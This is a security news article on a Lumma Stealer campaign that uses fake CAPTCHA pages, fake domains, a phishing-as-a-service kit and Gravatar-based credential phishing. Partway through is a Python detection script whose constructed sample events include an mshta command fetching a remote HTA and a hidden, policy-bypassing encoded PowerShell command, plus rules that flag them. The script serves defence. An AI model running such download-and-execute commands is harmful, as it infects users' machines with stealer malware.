Jan 23, 2025 | Ravie Lakshmanan | Phishing / Malware
Cybersecurity researchers are calling attention to a new malware campaign that uses fake CAPTCHA verification checks to deliver the notorious Lumma information stealer.
“The campaign is global, with Netskope Threat Labs tracking victims targeted in Argentina, Colombia, the United States, the Philippines, and other countries around the world,” Leandro Fróes, top threat research engineer at Netskope Threat Labs, said in a statement shared with The Hacker News.
“The campaign also spans many industries, including healthcare, banking, and advertising, with the telecom industry having the highest number of organizations targeted.”
The attack chain begins when a victim visits a compromised website, which redirects them to a fake CAPTCHA page. That page instructs the visitor to copy and paste a command into the Windows Run prompt; the command uses the native mshta binary to download and execute an HTA file from a remote server.
It’s worth noting that an earlier iteration of this technique involved the execution of a Base64-encoded PowerShell script to trigger the Lumma Stealer infection.
The HTA file in turn executes a PowerShell command to launch a next-stage payload: a PowerShell script that unpacks a second PowerShell script responsible for decoding and loading the Lumma payload, but not before attempting to bypass the Windows Antimalware Scan Interface in an effort to evade detection.
By having the victim copy and run the command this way, the attacker sidesteps browser-based defenses, since every step of the infection takes place outside the browser context, Fróes said.
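The chain above (Run prompt to mshta, mshta fetching a remote HTA, HTA spawning PowerShell) leaves a recognisable parent/child pattern in process-creation telemetry. The following Python is an added defender-side example, not code from the article or from Netskope; the record layout, paths, URL and command lines are constructed for the example, and the rule names are my own.

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 style, simplified).
# Every path, URL and command line here is made up for this example.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\explorer.exe",
     "parent": r"C:\Windows\System32\userinit.exe",
     "cmdline": "explorer.exe"},
    {"image": r"C:\Windows\System32\mshta.exe",           # typed into the Run prompt
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "mshta https://example.invalid/verify.hta"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\mshta.exe",          # HTA spawning PowerShell
     "cmdline": "powershell -w hidden -ep bypass -enc QQBCAEMA"},
    {"image": r"C:\Windows\System32\mshta.exe",           # benign local HTA from an installer
     "parent": r"C:\Program Files\Vendor\setup.exe",
     "cmdline": r"mshta C:\Program Files\Vendor\wizard.hta"},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# PowerShell accepts any unambiguous prefix of -EncodedCommand.
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\b", re.IGNORECASE)

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the names of the rules matched by one process-creation record."""
    hits = []
    image, parent = basename(event["image"]), basename(event["parent"])
    cmdline = event["cmdline"]
    if image == "mshta.exe":
        if URL_RE.search(cmdline):
            hits.append("mshta_remote_hta")        # HTA fetched from a remote server
        if parent == "explorer.exe":
            hits.append("mshta_from_run_dialog")   # Run prompt children sit under explorer.exe
    if image in ("powershell.exe", "pwsh.exe"):
        if parent == "mshta.exe":
            hits.append("powershell_child_of_mshta")
        if ENC_RE.search(cmdline):
            hits.append("powershell_encoded_command")
    return hits

def scan(events):
    """Map the index of each suspicious record to the rules it matched."""
    return {i: hits for i, e in enumerate(events) if (hits := classify(e))}
```

The installer record matches nothing because its HTA is local and its parent is not explorer.exe; the two campaign-style records each trigger two rules.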
“The Lumma Stealer operates using the malware-as-a-service (MaaS) model and has been extremely active in the past months. It makes monitoring and blocking of such threats more complicated by using various delivery methods and payloads, especially when using user interaction within the system.”
Lumma has also been distributed as recently as this month via roughly 1,000 fake domains impersonating Reddit and WeTransfer that redirect users to download password-protected archives.
According to Sekoia researcher crep1x, these archive files contain an AutoIT dropper dubbed SelfAU3 Dropper that executes the stealer. Threat actors used a similar technique in early 2023, spinning up over 1,300 domains posing as AnyDesk to distribute the Vidar Stealer malware.
In a new in-depth analysis of the stealer, Israeli security firm Cybereason highlighted its highly diverse infection vectors, which range from phishing emails and cracked software to fake hacktools and comments on GitHub and YouTube.
Barracuda Networks reported an updated version of a phishing-as-a-service (PhaaS) toolkit that includes advanced features to “obstruct, derail, and otherwise thwart attempts by security tools to confirm its malicious intent and inspect its web pages.”
These include using legitimate, potentially compromised email accounts to send phishing emails, and taking a number of anti-analysis measures, including detecting web-inspection keystrokes, disabling the right-click context menu, and detecting automated security scripts.
Social engineering-oriented credential harvesting attacks have also been observed leveraging the avatar provider Gravatar to mimic various legitimate services like AT&T, Comcast, Eastlink, Infinity, Kojeko, and Proton Mail.
“By exploiting Gravatar’s ‘Profiles as a Service,’ attackers create convincing fake profiles that mimic legitimate services, tricking users into divulging their credentials,” SlashNext Field CTO Stephen Kowski said.
“Attackers can tailor their fake profiles more closely to the legitimate services they’re mimicking than generic phishing attempts by going through services that are rarely known or protected.”